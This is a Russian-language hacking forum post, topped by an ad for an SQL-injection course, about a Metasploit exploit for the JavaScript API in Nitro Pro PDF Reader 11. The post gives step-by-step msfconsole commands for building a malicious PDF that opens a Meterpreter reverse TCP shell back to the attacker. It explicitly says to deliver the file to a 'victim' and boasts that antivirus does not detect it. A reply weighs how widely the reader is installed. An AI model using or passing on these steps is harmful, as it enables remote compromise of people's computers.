• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Soft Nitro Pro PDF Reader - Удаленное выполнение кода Javascript API (Metasploit)

Доброго дня форумчане!
Лазал я тут намедни по свеженьким эксплоитам и наткнулся на в полне не плохую на мой взгляд эксплуатацию
Характеристики кода: Этот модуль использует небезопасный Javascript API , реализованный в Нитро Nitro Pro PDF Reader версии 11. SAVEAS () функция JavaScript API позволяет писать произвольные файлы в файл система. Кроме того, функция launchURL () позволяет злоумышленнику выполнять локальные файлы в файловой системе и в обход диалогового окна системы безопасности Примечание: Это 100% надежный (кривой переводчик))))

1. И так у кого нет в репазитории msf данного модуля скачиваем его
2. Скаченный експлойт переименновываем в (nitro_pdf_jsapi.rb) и копируем по пути :
/usr/share/metasploit-framework/modules/exploits/windows/fileformat
3.Далее : msfconsole

use exploit/windows/fileformat/nitro_pdf_jsapi
set lhost (ваш ip)
set lport 4444
set payload windows/meterpreter/reverse_tcp
set FILENAME (имя исходной полезной нагрузки).pdf
exploit

Файлик доставляем естественно жертве ) Минус данного модуля на мой взгляд что он работает на платформах где вместо Acrobat Reader установлена именно Nitro pdf editor не знаю на сколько он известен и у многих ли он установлен по умолчанию ..я лично с ним столкнулся при эксплуатации)

К великому сожалению собственное видео оформить не удалось т.к нужен апгрей железа(

PS: антивирусами пока что не палится)



 

Breed

Заблокирован
16.05.2017
194
238
BIT
0
он работает на платформах где вместо Acrobat Reader установлена именно Nitro pdf editor не знаю на сколько он известен и у многих ли он установлен по умолчанию ..я лично с ним столкнулся при эксплуатации)
Его предпочитают многие, судя по общению и опыту. Для стареньких и слабых рабочих станций он является отличной альтернативой громоздкому Acrobat Reader-у. Это как AIMP и WMP.
Так что вполне пригодится.
 
  • Нравится
Реакции: debian2017
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!